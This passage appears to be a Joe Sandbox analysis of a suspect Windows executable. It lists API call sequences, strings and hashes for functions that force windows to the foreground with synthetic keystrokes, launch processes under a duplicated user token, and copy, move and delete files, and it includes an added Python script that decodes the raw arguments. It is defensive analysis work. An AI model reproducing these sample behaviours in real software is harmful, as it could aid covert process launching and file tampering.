• API String ID: 197181222-0
• Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
• Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
• Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689

APIs
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00457691
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 12355e0c1cd2370de3c66ee78c10e1cdf78f5353f4a7960eda3dfd2e06e77a07
• Instruction ID: 585986ab59306b88a5763987f2255c0463a5351c33a64af797a68cbfb1d2d2f8
• Opcode Fuzzy Hash: 12355e0c1cd2370de3c66ee78c10e1cdf78f5353f4a7960eda3dfd2e06e77a07
• Instruction Fuzzy Hash: D411A931200A009FD314EF29D844F96F7A9FF85320F1081ABE9488B3A1CB75F841CB95
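The API records in these entries show every argument as a raw DWORD: `00000002,00001388` on the SendMessageTimeoutW call, `00008000` on VirtualFree, and message numbers such as `0000130B`, `0000110A` or `00001030` on the SendMessageW calls of the next function. The following Python script is an added triage aid, not part of the Joe Sandbox report and not code from the analysed sample. It parses records in the page's `Api.MODULE(args), ref: ADDR` format and resolves the arguments whose meaning is fixed by the Win32 headers: window message numbers in the LVM_/TVM_/TCM_ ranges and WM_NULL/WM_NOTIFY, SMTO_ flags and the timeout, virtual-key codes, and VirtualFree free types. The sample records are copied from this page; the constant names are the standard winuser.h/commctrl.h/memoryapi.h values; a `?` argument is one the sandbox could not resolve and is passed through unchanged, as is any position the tables do not cover.

```python
"""Decode the 'APIs' bullets of a Joe Sandbox function entry into symbolic calls.

Added example; not Joe Sandbox code. Constant tables are standard Win32 values.
"""
import re
from typing import Optional

# Constructed sample: records copied verbatim from the entries on this page.
SAMPLE_RECORDS = """\
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 0043633F
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00457691
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
• DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
• GetKeyState.USER32(00000011), ref: 0047C92D
• SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
• _wcsncpy.LIBCMT ref: 0047CA29
• SendMessageW.USER32 ref: 0047CA7F
• SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
"""

# One bullet: "Api.MODULE(arg,arg,...), ref: ADDR" or "Api.MODULE ref: ADDR" (no args captured).
_RECORD_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Window messages present in the listing. LVM_FIRST=0x1000, TV_FIRST=0x1100, TCM_FIRST=0x1300.
WINDOW_MESSAGES = {
    0x0000: "WM_NULL",
    0x004E: "WM_NOTIFY",
    0x1012: "LVM_HITTEST",      # LVM_FIRST + 18
    0x1030: "LVM_SORTITEMS",    # LVM_FIRST + 48; lParam is the compare callback
    0x110A: "TVM_GETNEXTITEM",  # TV_FIRST + 10
    0x110B: "TVM_SELECTITEM",   # TV_FIRST + 11
    0x1111: "TVM_HITTEST",      # TV_FIRST + 17
    0x113E: "TVM_GETITEMW",     # TV_FIRST + 62
    0x130B: "TCM_GETCURSEL",    # TCM_FIRST + 11
}
SMTO_FLAGS = {0x0: "SMTO_NORMAL", 0x1: "SMTO_BLOCK", 0x2: "SMTO_ABORTIFHUNG", 0x8: "SMTO_NOTIMEOUTIFNOTHUNG"}
VIRTUAL_KEYS = {0x09: "VK_TAB", 0x10: "VK_SHIFT", 0x11: "VK_CONTROL"}
MEM_FREE_TYPES = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}


def _lookup(table):
    """Exact-value table; unknown values are kept as hex so nothing is silently dropped."""
    return lambda v: table.get(v, f"0x{v:08X}")


def _flags(table):
    """Bit-set table (OR-able flags); leftover bits are shown as hex."""
    def fmt(v):
        if v == 0:
            return table.get(0, "0")
        names = [name for bit, name in table.items() if bit and v & bit]
        rest = v & ~sum(bit for bit in table if bit)
        if rest:
            names.append(f"0x{rest:X}")
        return "|".join(names)
    return fmt


def _millis(v):
    return f"{v}ms"


# api name -> {argument index: decoder}. Positions not listed are left raw.
ARG_DECODERS = {
    "SendMessageW": {1: _lookup(WINDOW_MESSAGES)},
    "SendMessageTimeoutW": {1: _lookup(WINDOW_MESSAGES), 4: _flags(SMTO_FLAGS), 5: _millis},
    "DefDlgProcW": {1: _lookup(WINDOW_MESSAGES)},
    "GetKeyState": {0: _lookup(VIRTUAL_KEYS)},
    "VirtualFree": {2: _lookup(MEM_FREE_TYPES)},
}


def parse_api_record(line: str) -> Optional[dict]:
    """Split one bullet into api, module, argument strings and call-site address; None if not a record."""
    m = _RECORD_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [] if raw is None else [a.strip() for a in raw.split(",")]
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def decode_args(api: str, args: list) -> list:
    """Resolve known numeric arguments to symbolic names; '?' and uncovered positions pass through."""
    decoders = ARG_DECODERS.get(api, {})
    out = []
    for i, a in enumerate(args):
        if a == "?" or i not in decoders:
            out.append(a)
            continue
        try:
            out.append(decoders[i](int(a, 16)))
        except ValueError:   # not a hex DWORD (sandbox sometimes prints other tokens)
            out.append(a)
    return out


def decode_record(line: str) -> Optional[str]:
    """One line of output: 'ADDR  MODULE  Api(decoded args)' or None for non-record lines."""
    rec = parse_api_record(line)
    if rec is None:
        return None
    args = decode_args(rec["api"], rec["args"])
    call = f"{rec['api']}({', '.join(args)})" if rec["args"] else rec["api"]
    return f"{rec['ref']:08X}  {rec['module']:<10} {call}"


def decode_listing(text: str) -> list:
    """Decode every record in a pasted 'APIs' section, skipping headings and non-record lines."""
    return [d for d in (decode_record(line) for line in text.splitlines()) if d is not None]


if __name__ == "__main__":
    print("\n".join(decode_listing(SAMPLE_RECORDS)))
```

Run on the records above, the SendMessageTimeoutW call becomes `SendMessageTimeoutW(?, WM_NULL, 00000000, 00000000, SMTO_ABORTIFHUNG, 5000ms, ?)`, the standard "is this window still responding?" probe, and the VirtualFree call becomes `VirtualFree(?, 00000000, MEM_RELEASE)`. The TCM_GETCURSEL, TVM_GETNEXTITEM, TVM_GETITEMW, LVM_SORTITEMS and LVM_HITTEST decodes mark the function at 0047C8E1..0047CF1C as common-controls GUI handling (tab, tree view and list view plumbing), which lets an analyst deprioritise it and spend time on the entries that touch files, memory and the network. Extend the tables as new message numbers appear; an unknown value is printed as hex rather than guessed.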

APIs
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
• DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
• GetKeyState.USER32(00000011), ref: 0047C92D
• GetKeyState.USER32(00000009), ref: 0047C936
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
• GetKeyState.USER32(00000010), ref: 0047C953
• GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
• SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
• SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
• _wcsncpy.LIBCMT ref: 0047CA29
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
• SendMessageW.USER32 ref: 0047CA7F
• InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
• SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
• ImageList_SetDragCursorImage.COMCTL32(00B26C98,00000000,00000000,00000000), ref: 0047CB9B
• ImageList_BeginDrag.COMCTL32(00B26C98,00000000,000000F8,000000F0), ref: 0047CBAC
• SetCapture.USER32(?), ref: 0047CBB6
• ClientToScreen.USER32(?,?), ref: 0047CC17
• ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
• ReleaseCapture.USER32 ref: 0047CC3A
• GetCursorPos.USER32(?), ref: 0047CC72
• ScreenToClient.USER32(?,?), ref: 0047CC80
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
• SendMessageW.USER32 ref: 0047CD12
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
• SendMessageW.USER32 ref: 0047CD80
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
• GetCursorPos.USER32(?), ref: 0047CDC8
• ScreenToClient.USER32(?,?), ref: 0047CDD6
• GetParent.USER32(00000000), ref: 0047CDF7
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
• SendMessageW.USER32 ref: 0047CE93
• ClientToScreen.USER32(?,?), ref: 0047CEEE
• TrackPopupMenuEx.USER32(?,00000000,?,?,017D1A90,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,017D1A90,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                                                                                                            • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                                                            • API String ID: 3100379633-4164748364
                                                                                                                                                                                                                                                            • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                                                                                                                            • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                                                                                                                                                            • IsIconic.USER32(?), ref: 0043444F
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                            • API String ID: 2889586943-2988720461
                                                                                                                                                                                                                                                            • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                                                                                                                            • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                                                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                                                                                                                                                            • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                                                                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                                                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00446498
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                                                                                                                                                                            • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                                                                                                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                                                                                                                                                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                                                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                                                                                                                                                            • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                                                                                                                                                            • CloseDesktop.USER32(?), ref: 0044657A
• SetProcessWindowStation.USER32(?), ref: 00446588
• CloseHandle.KERNEL32(?), ref: 00446592
• DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
• String ID: $@OH$default$winsta0
• API String ID: 3324942560-3791954436
• Opcode ID: b6829c8fcb7e7383e42c55797dfa06ace0a07bf9b006e94e96dae5363c822db3
• Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
• Opcode Fuzzy Hash: b6829c8fcb7e7383e42c55797dfa06ace0a07bf9b006e94e96dae5363c822db3
• Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\LKxcbzlwkz.exe,0040F545,C:\Users\user\Desktop\LKxcbzlwkz.exe,004A90E8,C:\Users\user\Desktop\LKxcbzlwkz.exe,?,0040F545), ref: 0041013C
  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
  • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• _wcscat.LIBCMT ref: 0044BD94
• _wcscat.LIBCMT ref: 0044BDBD
• __wsplitpath.LIBCMT ref: 0044BDEA
• FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
• _wcscpy.LIBCMT ref: 0044BE71
• _wcscat.LIBCMT ref: 0044BE83
• _wcscat.LIBCMT ref: 0044BE95
• lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
• DeleteFileW.KERNEL32(?), ref: 0044BED3
• MoveFileW.KERNEL32(?,?), ref: 0044BEF3
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
• DeleteFileW.KERNEL32(?), ref: 0044BF15
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
• FindClose.KERNEL32(00000000), ref: 0044BF33
• MoveFileW.KERNEL32(?,?), ref: 0044BF4F
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
• FindClose.KERNEL32(00000000), ref: 0044BF7C
Strings
Similarity
• API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
• String ID: \*.*
• API String ID: 2188072990-1173974218
• Opcode ID: 7a8d5f8610d379da30b712c8117f4eed38144bb63bbd26685d4741f30de440db
• Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
• Opcode Fuzzy Hash: 7a8d5f8610d379da30b712c8117f4eed38144bb63bbd26685d4741f30de440db
• Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
• FindClose.KERNEL32(00000000), ref: 00478924
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
• __swprintf.LIBCMT ref: 004789D3
• __swprintf.LIBCMT ref: 00478A1D
• __swprintf.LIBCMT ref: 00478A4B
• __swprintf.LIBCMT ref: 00478A79
  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
• __swprintf.LIBCMT ref: 00478AA7
• __swprintf.LIBCMT ref: 00478AD5
• __swprintf.LIBCMT ref: 00478B03
Strings
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                                                                                                                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                                                            • API String ID: 999945258-2428617273
                                                                                                                                                                                                                                                            • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                                                                                                                                            • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
• __wsplitpath.LIBCMT ref: 00403492
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• _wcscpy.LIBCMT ref: 004034A7
• _wcscat.LIBCMT ref: 004034BC
• SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
• _wcscpy.LIBCMT ref: 004035A0
• _wcslen.LIBCMT ref: 00403623
• _wcslen.LIBCMT ref: 0040367D
Strings
• Error opening the file, xrefs: 00428231
• _, xrefs: 0040371C
• #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
• Unterminated string, xrefs: 00428348
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
• String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
• API String ID: 3393021363-188983378
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
• GetFileAttributesW.KERNEL32(?), ref: 00431AE7
• SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
• FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
• FindClose.KERNEL32(00000000), ref: 00431B20
• FindClose.KERNEL32(00000000), ref: 00431B34
• FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
• SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
• FindClose.KERNEL32(00000000), ref: 00431BCD
• FindClose.KERNEL32(00000000), ref: 00431BDB
Strings
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
• __swprintf.LIBCMT ref: 00431C2E
• _wcslen.LIBCMT ref: 00431C3A
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
Strings
Similarity
• API ID: CreateDirectoryFullNamePath__swprintf_wcslen
• String ID: :$\$\??\%s
• API String ID: 2192556992-3457252023
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 004722B9
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
